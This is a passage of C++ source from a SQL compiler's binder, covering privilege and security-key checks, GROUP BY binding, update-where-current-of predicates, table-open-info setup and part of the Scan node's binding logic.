thisUserID, privInfo); cmpSBD.switchBackCompiler(); if (retcode != STATUS_GOOD) { bindWA->setFailedForPrivileges(TRUE); RemoveNATableEntryFromCache = TRUE; *CmpCommon::diags() << DgSqlCode( -1034 ); return FALSE; } // Verify that the user has usage priv if (privInfo.hasPriv(USAGE_PRIV)) { // Do we need to add any QI keys to the plan? } // plan requires privilege but user has none, report an error else { bindWA->setFailedForPrivileges( TRUE ); RemoveNATableEntryFromCache = TRUE; *CmpCommon::diags() << DgSqlCode( -4491 ) << DgString0( "USAGE" ) << DgString1( tab->getTableName().getQualifiedNameAsAnsiString()); } } // for loop over sequences return !bindWA->failedForPrivileges() ; } void RelRoot::findKeyAndInsertInOutputList( ComSecurityKeySet KeysForTab , const uint32_t userHashValue , const PrivType which ) { ComSecurityKey dummyKey; ComQIActionType objectActionType = dummyKey.convertBitmapToQIActionType ( which, ComSecurityKey::OBJECT_IS_OBJECT ); ComSecurityKey * UserSchemaKey = NULL; ComSecurityKey * UserObjectKey = NULL; ComSecurityKey * RoleSchemaKey = NULL; ComSecurityKey * RoleObjectKey = NULL; ComSecurityKey * BestKey = NULL; ComSecurityKey * thisKey = &(KeysForTab[0]); uint32_t hashValueOfPublic = 0; // NOTE: hashValueOfPublic will be the same for all keys, so we generate it only once. if ( KeysForTab.entries() > 0 ) hashValueOfPublic = thisKey->generateHash(PUBLIC_USER); // Traverse List looking for ANY appropriate ComSecurityKey for ( Int32 ii = 0; ii < (Int32)(KeysForTab.entries()); ii++ ) { thisKey = &(KeysForTab[ii]); if ( thisKey->getSecurityKeyType() == objectActionType ) { if ( thisKey->getSubjectHashValue() == hashValueOfPublic || thisKey->getSubjectHashValue() == userHashValue ) { if ( ! UserObjectKey ) UserObjectKey = thisKey; } else if ( ! RoleObjectKey ) RoleObjectKey = thisKey; } else {;} // Not right action type, just continue traversing. } if ( UserObjectKey ) BestKey = UserObjectKey ; else if ( RoleObjectKey ) BestKey = RoleObjectKey ; if ( BestKey == NULL) return; // Sometimes there aren't any security keys securityKeySet_.insert(*BestKey); uint32_t SubjHashValue = BestKey->getSubjectHashValue(); hashValueOfPublic = BestKey->generateHash(PUBLIC_USER); // Check whether this privilege was granted to PUBLIC. If so, nothing more to check. if ( SubjHashValue == hashValueOfPublic ) return; while ( SubjHashValue != userHashValue ) //While we see a ComSecurityKey for a Role { NABoolean found = FALSE; for ( Int32 ii = 0; ii < (Int32)(KeysForTab.entries()); ii++ ) { // If this ComSecurityKey is a GRANT type and the grantee (the object) // is the Role specified by SubjHashValue, then break out of inner loop. ComSecurityKey * thisKey = &(KeysForTab[ii]); if ( ( thisKey->getObjectHashValue() == SubjHashValue ) && ( (thisKey->getSecurityKeyType() == COM_QI_USER_GRANT_ROLE ) ) ) { securityKeySet_.insert(*thisKey); // Insert this GRANT type ComSecurityKey into the Plan found = TRUE; SubjHashValue = thisKey->getSubjectHashValue(); break; // We found the user or Role which granted the user the privilege } } // found should never be FALSE CMPASSERT(found) } } // ----------------------------------------------------------------------- // member functions for class GroupByAgg // ----------------------------------------------------------------------- RelExpr *GroupByAgg::bindNode(BindWA *bindWA) { NABoolean specialMode = ((CmpCommon::getDefault(MODE_SPECIAL_1) == DF_ON) || (CmpCommon::getDefault(MODE_SPECIAL_2) == DF_ON)); if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // // add any aggregate functions found in the parent node(s) // BindScope *currScope = bindWA->getCurrentScope(); aggregateExpr_ += currScope->getUnresolvedAggregates(); currScope->getUnresolvedAggregates().clear(); // // Bind the child nodes. // currScope->context()->lookAboveToDecideSubquery() = TRUE; bindChildren(bindWA); currScope->context()->lookAboveToDecideSubquery() = FALSE; if (bindWA->errStatus()) return this; bindWA->getCurrentScope()->setRETDesc(getRETDesc()); // QSTUFF NAString fmtdList(bindWA->wHeap()); LIST(TableNameMap*) xtnmList(bindWA->wHeap()); bindWA->getTablesInScope(xtnmList, &fmtdList); // can be removed when supporting aggregates on streams if (getGroupAttr()->isStream()){ *CmpCommon::diags() << DgSqlCode(-4162) << DgString0(fmtdList); bindWA->setErrStatus(); return this; } if ((getGroupAttr()->isEmbeddedUpdateOrDelete()) || (bindWA->isEmbeddedIUDStatement())) { *CmpCommon::diags() << DgSqlCode(-4163) << DgString0(fmtdList) << (getGroupAttr()->isEmbeddedUpdate() ? DgString1("UPDATE"):DgString1("DELETE")); bindWA->setErrStatus(); return this; } // QSTUFF // if unresolved aggregate functions have been found in the children of the // Groupby node, that would mean that we are referencing aggregates before // the groupby operation is performed // if (checkUnresolvedAggregates(bindWA)) return this; // // Detach the item expression tree for the grouping column list, bind it, // convert it to a ValueIdSet, and attach it to the GroupByAgg node. // ItemExpr *groupExprTree = removeGroupExprTree(); if (groupExprTree) { currScope->context()->inGroupByClause() = TRUE; groupExprTree->convertToValueIdSet(groupExpr(), bindWA, ITM_ITEM_LIST); currScope->context()->inGroupByClause() = FALSE; if (bindWA->errStatus()) return this; ValueIdList groupByList(groupExpr()); for (CollIndex i = 0; i < groupByList.entries(); i++) { ValueId vid = groupByList[i]; vid.getItemExpr()->setIsGroupByExpr(TRUE); } if (((CmpCommon::getDefault(GROUP_BY_USING_ORDINAL) != DF_OFF) || (specialMode)) && (groupExprTree != NULL) && (getParentRootSelectList() != NULL)) { RETDesc * childRETDesc = child(0)->getRETDesc(); ItemExprList origSelectList(getParentRootSelectList(), bindWA->wHeap()); for (CollIndex i = 0; i < groupByList.entries(); i++) { ValueId vid = groupByList[i]; if((vid.getItemExpr()->getOperatorType() == ITM_SEL_INDEX)&& (((SelIndex*)(vid.getItemExpr()))->renamedColNameInGrbyClause())) { ULng32 indx = ((SelIndex*)(vid.getItemExpr()))->getSelIndex() - 1; if (origSelectList.entries() > indx && origSelectList[indx]->getOperatorType() == ITM_RENAME_COL) { const ColRefName &selectListColRefName = *((RenameCol *)origSelectList[indx])->getNewColRefName(); ColumnNameMap *baseColExpr = childRETDesc->findColumn(selectListColRefName); if (baseColExpr) { groupExpr().remove(vid); groupExpr().insert(baseColExpr->getValueId()); baseColExpr->getColumnDesc()->setGroupedFlag(); origSelectList[indx]->setInGroupByOrdinal(FALSE); } } } } if (getSelPredTree()) { ItemExpr * havingPred = (ItemExpr *) getSelPredTree(); // see if having expr refers to any renamed col in the select list. // that is NOT a name exposed by child RETDesc. // If it does, replace it with SelIndex. // For now, do this for special1 mode and only if the having // is a simple pred of the form: col <op> value. // Later, we can extend this to all kind of having pred by // traversing the having pred tree and replacing renamed cols. NABoolean replaced = FALSE; NABoolean notAllowedWithSelIndexInHaving = FALSE; replaceRenamedColInHavingWithSelIndex( bindWA, havingPred, origSelectList, replaced, notAllowedWithSelIndexInHaving,child(0)->getRETDesc()); if (bindWA->errStatus()) return this; if (replaced) { if (notAllowedWithSelIndexInHaving) { *CmpCommon::diags() << DgSqlCode(-4196) ; bindWA->setErrStatus(); return this; } setSelIndexInHaving(TRUE); } } setParentRootSelectList(NULL); } // Indicate that we are not in a scalar groupby. Any aggregate // functions found in the select list or having clause cannot // evaluate to NULL unless their argument is null. currScope->context()->inScalarGroupBy() = FALSE; } // // bind the having predicates and attach the resulting value id set // to the node (as a selection predicate on the groupby node) // ItemExpr *havingPred = removeSelPredTree(); if (havingPred && NOT selIndexInHaving()) { currScope->context()->inHavingClause() = TRUE; havingPred->convertToValueIdSet(selectionPred(), bindWA, ITM_AND); currScope->context()->inHavingClause() = FALSE; if (bindWA->errStatus()) return this; } // // Bind the base class. // RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return boundExpr; if ((havingPred) && (selIndexInHaving())) { addSelPredTree(havingPred); } // // Get the aggregate expressions from the list that has accumulated // in the current bind scope and clear the list in the bind scope -- // but first, if Tuple::bindNode()/checkTupleElementsAreAllScalar() // created this node, add the subquery aggregate expr // (Genesis 10-000221-6676). // if (aggregateExprTree_) { // only Binder, not Parser, should put anything here // CMPASSERT(bindWA->getCurrentScope()->context()->inTupleList()); CMPASSERT(aggregateExprTree_->nodeIsBound() || aggregateExprTree_->child(0)->nodeIsBound()); aggregateExprTree_ = aggregateExprTree_->bindNode(bindWA); if (bindWA->errStatus()) return boundExpr; aggregateExpr_ += aggregateExprTree_->getValueId(); aggregateExprTree_ = NULL; } aggregateExpr_ += currScope->getUnresolvedAggregates(); currScope->getUnresolvedAggregates().clear(); getRETDesc()->setGroupedFlag(); return boundExpr; } // GroupByAgg::bindNode() // ----------------------------------------------------------------------- // member functions for class Scan // ----------------------------------------------------------------------- //////////////////////////////////////////////////////////////////////// // A list of 'fabricated' hostvar representing the hostvars is generated // that will contain the primary key values. These primary key // values are retrieved at runtime from the cursor statement // specified in the 'current of' clause. A predicate of the // form 'where pkey1 = :pkey1 and pkey2 = :pkey2...' is attached // to the selection pred of this node. The hostvar values are // then passed in by the root node to its child and they reach // this node at runtime where the 'where' predicate is evaluated. //////////////////////////////////////////////////////////////////////// void Scan::bindUpdateCurrentOf(BindWA *bindWA, NABoolean updateQry) { ValueIdList keyList = getTableDesc()->getClusteringIndex()->getIndexKey(); ItemExpr * rootPtr = NULL; char hvName[30]; CollIndex i = 0; for (i = 0; i < keyList.entries(); i++) { ValueId vid = keyList[i]; // Fabricate a name for the i'th host variable, // make a hostvar,add it to pkeyHvarList. sprintf(hvName,"_upd_pkey_HostVar%d",i); HostVar *hv = new(bindWA->wHeap()) HostVar(hvName, &vid.getType(), TRUE); hv->bindNode(bindWA); pkeyHvarList().insert(hv->getValueId()); // Build a 'pkey = pkey_hvar' predicate. ItemExpr * eqPred = new(bindWA->wHeap()) BiRelat(ITM_EQUAL, vid.getItemExpr(), hv); if (!rootPtr) rootPtr = eqPred; else rootPtr = new(bindWA->wHeap()) BiLogic(ITM_AND, rootPtr, eqPred); } // loop over all pkey columns if (updateQry) { ItemExpr * updCheckPtr = NULL; ValueIdList nonKeyColList; getTableDesc()->getClusteringIndex()->getNonKeyColumnList(nonKeyColList); for (i = 0; i < nonKeyColList.entries(); i++) { ValueId vid = nonKeyColList[i]; // Fabricate a name for the i'th host variable, // make a hostvar,add it to pkeyHvarList. sprintf(hvName,"_upd_col_HostVar%d",i); HostVar *hv = new(bindWA->wHeap()) HostVar(hvName, &vid.getType(), TRUE); hv->bindNode(bindWA); pkeyHvarList().insert(hv->getValueId()); // Build a 'col = col_hvar' predicate. ItemExpr * eqPred = new(bindWA->wHeap()) BiRelat(ITM_EQUAL, vid.getItemExpr(), hv, TRUE); if (!updCheckPtr) updCheckPtr = eqPred; else updCheckPtr = new(bindWA->wHeap()) BiLogic(ITM_AND, updCheckPtr, eqPred); } // loop over all pkey columns if (updCheckPtr) { updCheckPtr = new (bindWA->wHeap()) Case(NULL, new (bindWA->wHeap()) IfThenElse(updCheckPtr, new (bindWA->wHeap()) BoolVal(ITM_RETURN_TRUE), new (bindWA->wHeap()) BoolVal(ITM_RETURN_TRUE, new (bindWA->wHeap()) RaiseError(-(Lng32)EXE_CURSOR_UPDATE_CONFLICT)))); rootPtr = new(bindWA->wHeap()) BiLogic(ITM_AND, rootPtr, updCheckPtr); } } // rootPtr->bindNode(bindWA); // add this new tree to the existing selection predicate addSelPredTree(rootPtr); bindSelf(bindWA); // just in case } // Scan::bindUpdateCurrentOf() // Every Scan and every GenericUpdate has its own stoi, // plus copies of some of these stoi's are copied to the BindWA // // The scan/gu stoi's will become ex_partn_access stoi's // // The stoiList copies in BindWA will have their security // checked in the binder, in RelRoot::checkPrivileges // // Stoi's must exist for every table/view/MV/index. // Stoi's that are not copied to the BindWA are those for which Ansi mandates // that no security checking be done (e.g., indexes). // OptSqlTableOpenInfo *setupStoi(OptSqlTableOpenInfo *&optStoi_, BindWA *bindWA, const RelExpr *re, const NATable *naTable, const CorrName &corrName, NABoolean noSecurityCheck) { // Get the PHYSICAL (non-Ansi/non-delimited) filename of the table or view. CMPASSERT(!naTable->getViewText() || naTable->getViewFileName()); NAString fileName( naTable->getViewText() ? (NAString)naTable->getViewFileName() : naTable->getClusteringIndex()-> getFileSetName().getQualifiedNameAsString(), bindWA->wHeap()); SqlTableOpenInfo * stoi_ = new (bindWA->wHeap()) SqlTableOpenInfo; optStoi_ = new(bindWA->wHeap()) OptSqlTableOpenInfo(stoi_, corrName, bindWA->wHeap()); stoi_->setFileName(convertNAString(fileName, bindWA->wHeap())); if (naTable->getIsSynonymTranslationDone()) { stoi_->setAnsiName(convertNAString( naTable->getSynonymReferenceName(), bindWA->wHeap())); } else { stoi_->setAnsiName(convertNAString( naTable->getTableName().getQualifiedNameAsAnsiString(), bindWA->wHeap())); } if(naTable->isUMDTable() || naTable->isSMDTable() || naTable->isMVUMDTable() || naTable->isTrigTempTable()) { stoi_->setIsMXMetadataTable(1); } if (NOT corrName.getCorrNameAsString().isNull()) { NABoolean corrNameSpecified = TRUE; if (corrNameSpecified) { stoi_->setCorrName(convertNAString( corrName.getCorrNameAsString(), bindWA->wHeap())); } } // Materialized-View is considered as a regular table stoi_->setSpecialTable(naTable->getSpecialType() != ExtendedQualName::NORMAL_TABLE && naTable->getSpecialType() != ExtendedQualName::MV_TABLE); stoi_->setIsView(naTable->getViewText() ? TRUE : FALSE); if (naTable->isHbaseTable()) stoi_->setIsHbase(TRUE); stoi_->setLocationSpecified(corrName.isLocationNameSpecified() || corrName.isPartitionNameSpecified() ); stoi_->setUtilityOpen(corrName.isUtilityOpenIdSpecified()); stoi_->setUtilityOpenId(corrName.getUtilityOpenId()); stoi_->setIsNSAOperation(corrName.isNSAOperation()); if (! naTable->getViewText()) stoi_->setIsAudited(naTable->getClusteringIndex()->isAudited()); switch (re->getOperatorType()) { case REL_UNARY_INSERT: case REL_LEAF_INSERT: stoi_->setInsertAccess(); break; case REL_UNARY_UPDATE: { stoi_->setUpdateAccess(); if (((GenericUpdate*)re)->isMerge()) stoi_->setInsertAccess(); } break; case REL_UNARY_DELETE: case REL_LEAF_DELETE: { stoi_->setDeleteAccess(); if (((GenericUpdate*)re)->isMerge()) stoi_->setInsertAccess(); if (((Delete*)re)->isFastDelete()) stoi_->setSelectAccess(); } break; case REL_SCAN: case REL_LOCK: case REL_UNLOCK: case REL_HBASE_COPROC_AGGR: stoi_->setSelectAccess(); break; case REL_EXE_UTIL: stoi_->setSelectAccess(); stoi_->setInsertAccess(); stoi_->setUpdateAccess(); stoi_->setDeleteAccess(); break; default: CMPASSERT(FALSE); } NABoolean validateTS = TRUE; if ((naTable->getClusteringIndex() && naTable->getClusteringIndex()->isSystemTable()) || (NOT validateTS)) stoi_->setValidateTimestamp(FALSE); else stoi_->setValidateTimestamp(TRUE); // MV -- // For INTERNAL REFRESH statements, leave only the insert on the MV itself. if (re->getInliningInfo().isAvoidSecurityCheck() || (bindWA->isBindingMvRefresh() && (!naTable->isAnMV() || !stoi_->getInsertAccess()))) { return NULL; } // In a SCAN, only the topmost view is inserted into BindWA StoiList // (thus there will be no security check on underlying views/basetables, // as Ansi says there shouldn't). if (re->getOperatorType() == REL_SCAN && bindWA->viewCount()) { return NULL; } // Genesis 10-980306-4309: // Ansi says not supposed to be any security check on referenced tables, // nor of course on indexes, RIs and temp tables which are not an Ansi // notion to begin with. if ((naTable->getSpecialType() == ExtendedQualName::TRIGTEMP_TABLE) || (naTable->getSpecialType() == ExtendedQualName::IUD_LOG_TABLE) || (naTable->getSpecialType() == ExtendedQualName::INDEX_TABLE) || (naTable->getSpecialType() == ExtendedQualName::RESOURCE_FORK)) { return NULL; } if (noSecurityCheck) { return NULL; } if (re->getOperator().match(REL_ANY_GEN_UPDATE)&& (((GenericUpdate*)re)->getUpdateCKorUniqueIndexKey())) { return NULL; } OptSqlTableOpenInfo *stoiInList = NULL; for (CollIndex i=0; i < bindWA->getStoiList().entries(); i++) if (strcmp(bindWA->getStoiList()[i]->getStoi()->fileName(), fileName) == 0) { stoiInList = bindWA->getStoiList()[i]; break; } if (!stoiInList) { stoiInList = new(bindWA->wHeap()) OptSqlTableOpenInfo( new (bindWA->wHeap()) SqlTableOpenInfo(*stoi_), corrName, bindWA->wHeap()); stoiInList->setTable((NATable*)naTable); bindWA->getStoiList().insert(stoiInList); bindWA->hbaseColUsageInfo()->insert((QualifiedName*)&naTable->getTableName()); } else { // This is conceptually equivalent to // stoiInList->AccessFlags |= stoi_->AccessFlags : if (stoi_->getInsertAccess()) stoiInList->getStoi()->setInsertAccess(); if (stoi_->getUpdateAccess()) stoiInList->getStoi()->setUpdateAccess(); if (stoi_->getDeleteAccess()) stoiInList->getStoi()->setDeleteAccess(); if (stoi_->getSelectAccess()) stoiInList->getStoi()->setSelectAccess(); } return stoiInList; } // setupStoi() //---------------------------------------------------------------------------- RelExpr *Scan::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // -- Triggers // Is this a Scan on a temporary table inside the action of a statement trigger? if (getTableName().isATriggerTransitionName(bindWA)) return buildTriggerTransitionTableView(bindWA); // Located in Inlining.cpp // -- MV // Is this a Scan on a log inside the select statement of a Materialized View? // If so - maybe we need to replace this Scan with some other RelExpr tree. // Ignore when inDDL() because the log may not exist yet. if (!bindWA->inDDL() && getTableName().getSpecialType() == ExtendedQualName::NORMAL_TABLE) { const MvBindContext *pMvBindContext = bindWA->getClosestMvBindContext(); if (NULL != pMvBindContext) { RelExpr *replacementTree = pMvBindContext->getReplacementFor(getTableName().getQualifiedNameObj()); if (replacementTree != NULL) { // We need to replace the Scan on the base table by some other tree. // Make sure this tree has the same name as the Scan. const CorrName& baseCorrName = getTableName(); replacementTree = new(bindWA->wHeap()) RenameTable(TRUE, replacementTree, baseCorrName); // Move any selection predicates on the Scan to the tree. replacementTree->addSelPredTree(removeSelPredTree()); // Bind the tree and return instead of the tree. return replacementTree->bindNode(bindWA); } } } bindChildren(bindWA); if (bindWA->errStatus()) return this; // Get the NATable for this object. // NATable *naTable = bindWA->getNATable(getTableName()); if (bindWA->errStatus()) return this; // Set up stoi. bindWA->viewCount is altered during expanding the view. setupStoi(stoi_, bindWA, this, naTable, getTableName(), noSecurityCheck()); // If the object is a view, expand the view. // if (naTable->getViewText()) { // Allow view on exception_table or any other special_table_name objects ComBoolean specialTableFlagOn = Get_SqlParser_Flags(ALLOW_SPECIALTABLETYPE); if (specialTableFlagOn == FALSE) { Set_SqlParser_Flags(ALLOW_SPECIALTABLETYPE); SQL_EXEC_SetParserFlagsForExSqlComp_Internal(ALLOW_SPECIALTABLETYPE); } RelExpr * boundView = bindWA->bindView(getTableName(), naTable, accessOptions(), removeSelPredTree(), getGroupAttr(), TRUE/*catmanCollectUsages*/); // QSTUFF // First we checked whether its a view and if so it must be updatable // when using it for stream access or an embedded update or delete if (!naTable->isUpdatable() && getGroupAttr()->isEmbeddedUpdateOrDelete()){ *CmpCommon::diags() << DgSqlCode(-4206) << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()) << (getGroupAttr()->isEmbeddedUpdate() ? DgString0("UPDATE") : DgString0("DELETE")); bindWA->setErrStatus(); // restore ALLOW_SPECIALTABLETYPE setting if (specialTableFlagOn == FALSE) Reset_SqlParser_Flags(ALLOW_SPECIALTABLETYPE); return NULL; } if (!naTable->isUpdatable() && getGroupAttr()->isStream()){ *CmpCommon::diags() << DgSqlCode(-4151) << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); if (specialTableFlagOn == FALSE) Reset_SqlParser_Flags(ALLOW_SPECIALTABLETYPE); return NULL; } // Second we make sure the the underlying base table is key sequenced // in case of embedded d/u and streams // -- for as long as we don't support entry sequenced tables if (boundView->getLeftmostScanNode()) { // this is not a "create view V(a) as values(3)" kind of a view const NATable * baseTable = boundView->getLeftmostScanNode()->getTableDesc()->getNATable(); if (getGroupAttr()->isStream()) { if (!baseTable->getClusteringIndex()->isKeySequenced()) { *CmpCommon::diags() << DgSqlCode(-4204) << DgTableName( baseTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); if (specialTableFlagOn == FALSE) Reset_SqlParser_Flags(ALLOW_SPECIALTABLETYPE); return NULL; } } if (getGroupAttr()->isEmbeddedUpdateOrDelete()){ if (!baseTable->getClusteringIndex()->isKeySequenced()){ *CmpCommon::diags() << DgSqlCode(-4205) << DgTableName( baseTable->getTableName().getQualifiedNameAsAnsiString()) << (getGroupAttr()->isEmbeddedUpdate() ? DgString0("UPDATE") : DgString0("DELETE")); bindWA->setErrStatus(); if (specialTableFlagOn == FALSE) Reset_SqlParser_Flags(ALLOW_SPECIALTABLETYPE); return NULL; } } } // QSTUFF // restore ALLOW_SPECIALTABLETYPE setting if (specialTableFlagOn == FALSE) Reset_SqlParser_Flags(ALLOW_SPECIALTABLETYPE); return boundView; } // -- MV // If this is the expanded tree pass during CREATE MV, expand the MV into // its SELECT tree, just like a regular view. // Do this only for incremental MVs, otherwise they may introduce unsupported // operators such as Union. if (naTable->isAnMV() && bindWA->isExpandMvTree() && naTable->getMVInfo(bindWA)->isIncremental()) { CMPASSERT(bindWA->inDDL()); return bindExpandedMaterializedView(bindWA, naTable); } // Do not allow to select from an un initialized MV if (naTable->isAnMV() && !bindWA->inDDL() && !bindWA->isBindingMvRefresh()) { if (naTable->verifyMvIsInitializedAndAvailable(bindWA)) return NULL; } // Allocate a TableDesc and attach it to the Scan node. // This call also allocates a RETDesc, attached to the BindScope, // which we want to attach also to the Scan. // // disable override schema for synonym NABoolean os = FALSE; if ( ( bindWA->overrideSchemaEnabled() ) && ( ! naTable->getSynonymReferenceName().isNull() ) ) { os = bindWA->getToOverrideSchema(); bindWA->setToOverrideSchema(FALSE); } TableDesc * tableDesc = NULL; if ((NOT isHbaseScan()) || (! getTableDesc())) { tableDesc = bindWA->createTableDesc(naTable, getTableName(), FALSE, getHint()); } else tableDesc = getTableDesc(); // restore override schema setting if ( ( bindWA->overrideSchemaEnabled() ) && ( ! naTable->getSynonymReferenceName().isNull() ) ) bindWA->setToOverrideSchema(os); // before attaching set the selectivity hint defined by the user for this // table if (tableDesc && getHint() && getTableName().getSpecialType() == ExtendedQualName::NORMAL_TABLE) { double s; s = getHint()->getSelectivity(); if (0.0 <= s && s <= 1.0) { SelectivityHint *selHint = new (STMTHEAP) SelectivityHint(); selHint->setScanSelectivityFactor(s); tableDesc->setSelectivityHint(selHint); } if (getHint()->getCardinality() >= 1.0) { s = getHint()->getCardinality(); CostScalar scanCard(s); if((scanCard.getValue() - floor(scanCard.getValue())) > 0.00001) scanCard = ceil(scanCard.getValue()); CardinalityHint *cardHint = new (STMTHEAP) CardinalityHint(); cardHint->setScanCardinality(scanCard); tableDesc->setCardinalityHint(cardHint); } } setTableDesc(tableDesc); if (bindWA->errStatus()) return this; setRETDesc(bindWA->getCurrentScope()->getRETDesc()); if ((CmpCommon::getDefault(ALLOW_DML_ON_NONAUDITED_TABLE) == DF_OFF) && (naTable && naTable->getClusteringIndex() && !naTable->getClusteringIndex()->isAudited())) { *CmpCommon::diags() << DgSqlCode(-4211) << DgTableName( naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return NULL; } // restricted partitions for HBase table if (naTable->isHbaseTable() && (naTable->isPartitionNameSpecified() || naTable->isPartitionRangeSpecified())) { PartitioningFunction * partFunc = naTable->getClusteringIndex()->getPartitioningFunction(); // find the salt column and apply a predicate on the salt column. // For Hash2, since the partittion key columns are columns used to build // the _SALT_ column, we need to search all columns for the _SALT_ column. const NAColumnArray &ccCols = (partFunc && partFunc->castToHash2PartitioningFunction())? naTable->getClusteringIndex()->getAllColumns() : naTable->getClusteringIndex()->getPartitioningKeyColumns(); NABoolean saltColFound = FALSE; for (CollIndex i=0; i<ccCols.entries() && !saltColFound; i++) { if (ccCols[i]->isComputedColumn() && ccCols[i]->getColName() == ElemDDLSaltOptionsClause::getSaltSysColName()) { saltColFound = TRUE; // create a predicate "_SALT_" = <num> or // "_SALT_" between <num> and <num> Int32 beginPartNum = partFunc->getRestrictedBeginPartNumber() - 1; Int32 endPartNum = partFunc->getRestrictedEndPartNumber() - 1; // fill in defaults, indicated by -1 (-2 after subtraction above) if (beginPartNum < 0) beginPartNum = 0; if (endPartNum < 0) endPartNum = partFunc->getCountOfPartitions() - 1; ItemExpr *partPred = NULL; ColReference *saltColRef = new(bindWA->wHeap()) ColReference( new(bindWA->wHeap()) ColRefName( ccCols[i]->getFullColRefName(), bindWA->wHeap())); if (beginPartNum == endPartNum) { partPred = new(bindWA->wHeap()) BiRelat (ITM_EQUAL, saltColRef, new(bindWA->wHeap()) ConstValue(beginPartNum,bindWA->wHeap())); } else { partPred = new(bindWA->wHeap()) Between (saltColRef, new(bindWA->wHeap()) ConstValue(beginPartNum,bindWA->wHeap()), new(bindWA->wHeap()) ConstValue(endPartNum,bindWA->wHeap())); } ItemExpr *newSelPred = removeSelPredTree(); if (newSelPred) newSelPred = new(bindWA->wHeap()) BiLogic(ITM_AND, newSelPred, partPred); else newSelPred = partPred; // now add the partition predicates addSelPredTree(newSelPred->bindNode(bindWA)); } } if (!saltColFound) { // not allowed to select individual partitions from HBase tables // unless they are salted char buf[20]; snprintf(buf, 20, "%d", partFunc->getRestrictedBeginPartNumber()); *CmpCommon::diags() << DgSqlCode(-1276) << DgString0(buf) << DgTableName( naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return NULL; } } // Bind the base class. // RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return this; // // Assign the set of columns that belong to the table to be scanned // as the output values that can be produced by this scan. // getGroupAttr()->addCharacteristicOutputs(getTableDesc()->getColumnList()); getGroupAttr()->addCharacteristicOutputs(getTableDesc()->hbaseTSList()); // MV -- if (getInliningInfo().isMVLoggingInlined()) projectCurrentEpoch(bindWA); // QSTUFF // Second we make sure the the underlying base table is key sequenced in case // of embedded d/u and streams // -- for as long as we don't support entry sequenced tables if (getGroupAttr()->isStream()){ if (!naTable->getClusteringIndex()->isKeySequenced() || naTable->hasVerticalPartitions()){ *CmpCommon::diags() << DgSqlCode(-4204) << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return NULL; } if (!getTableDesc()->getClusteringIndex()->getNAFileSet()->isAudited()) { // Stream access not allowed on a non-audited table *CmpCommon::diags() << DgSqlCode(-4215) << DgTableName( naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return NULL; } } if (getGroupAttr()->isEmbeddedUpdateOrDelete()){ if (!naTable->getClusteringIndex()->isKeySequenced() || naTable->hasVerticalPartitions()){ *CmpCommon::diags() << DgSqlCode(-4205) << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()) << (getGroupAttr()->isEmbeddedUpdate() ? DgString0("UPDATE") : DgString0("DELETE")); bindWA->setErrStatus(); return NULL; } } // QSTUFF // Fix "browse access mode incorrectly starts transaction" genesis case // 10-021111-1080. Here's a glimpse at what may have been the original // intent of the old code (taken from RelExpr.h comment for the now // defunct RelExpr::propagateAccessOptions): // // At parse time, user can specify statement level access options. // (See SQL/ARK Language spec). These options are attached to the // RelRoot node and could be different for different Scans in the query. // All Scan and Update nodes under a RelRoot have the same Access // type and the Lock Mode. // // The problem is propagateAccessOptions did not visit all the Scans, // eg, it did not propagate to subquery Scans, and it did not propagate // to internal RelRoots. This "push" model seems harder to understand // and to do correctly. // // So, we go with the "pull" model. An interesting node such as a Scan, // GenericUpdate, RelRoot that needs a user-specified access/lock mode // can "pull" one from BindWA. BindWA already implements SQL scoping // and visibility rules. It's easier to explain also. Each table // reference inherits the user-specified access/lock mode of the // nearest SQL scope, going from the table outwards. If the entire // query has no user-specified access/lock mode, then it uses the // session-level default access/lock mode. // // if we have no user-specified access options then // get it from nearest enclosing scope that has one (if any) if (!accessOptions().userSpecified()) { StmtLevelAccessOptions *axOpts = bindWA->findUserSpecifiedAccessOption(); if (axOpts) { accessOptions() = *axOpts; } } // The above code is in RelRoot::bindNode also. // It would be nice to refactor this common code; someday. // See Halloween handling code in GenericUpdate::bindNode if (accessOptions().userSpecified()) { if ( accessOptions().accessType() == REPEATABLE_ || accessOptions().accessType() == STABLE_ || accessOptions().accessType() == BROWSE_ ) { naTable->setRefsIncompatibleDP2Halloween(); } } else { TransMode::IsolationLevel il = CmpCommon::transMode()->getIsolationLevel(); if((CmpCommon::transMode()->ILtoAT(il) == REPEATABLE_ ) || (CmpCommon::transMode()->ILtoAT(il) == STABLE_ ) || (CmpCommon::transMode()->ILtoAT(il) == BROWSE_ )) { naTable->setRefsIncompatibleDP2Halloween(); } } const NAString * tableLockVal = ActiveControlDB()->getControlTableValue( getTableName().getUgivenName(), "TABLELOCK"); if (*tableLockVal == "ON") naTable->setRefsIncompatibleDP2Halloween(); //Embedded update/delete queries on partitioned table //generates assertion when ATTEMPT_ASYNCHRONOUS_ACCESS //flag is OFF.This is because split operator is used. //Removing of split top operator causes some problems. //Error 66 from file system is one of them. //So, for now compiler will generate error if these //conditions occur. if (getGroupAttr()->isEmbeddedUpdateOrDelete() && naTable->getClusteringIndex()->isPartitioned() && (CmpCommon::getDefault(ATTEMPT_ASYNCHRONOUS_ACCESS) == DF_OFF)) { *CmpCommon::diags() << DgSqlCode(-4321) << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); return NULL; } // Stream access not allowed on a multi-partioned access paths, when // CQD ATTEMPT_ASYNCHRONOUS_ACCESS is set to OFF.If we find // that all access paths are partitioned we give an error. if (getGroupAttr()->isStream() && (CmpCommon::getDefault(ATTEMPT_ASYNCHRONOUS_ACCESS) == DF_OFF)) { NABoolean atleastonenonpartitionedaccess = FALSE; NAFileSetList idescList = naTable->getIndexList(); for(CollIndex i = 0; i < idescList.entries() && !atleastonenonpartitionedaccess; i++) 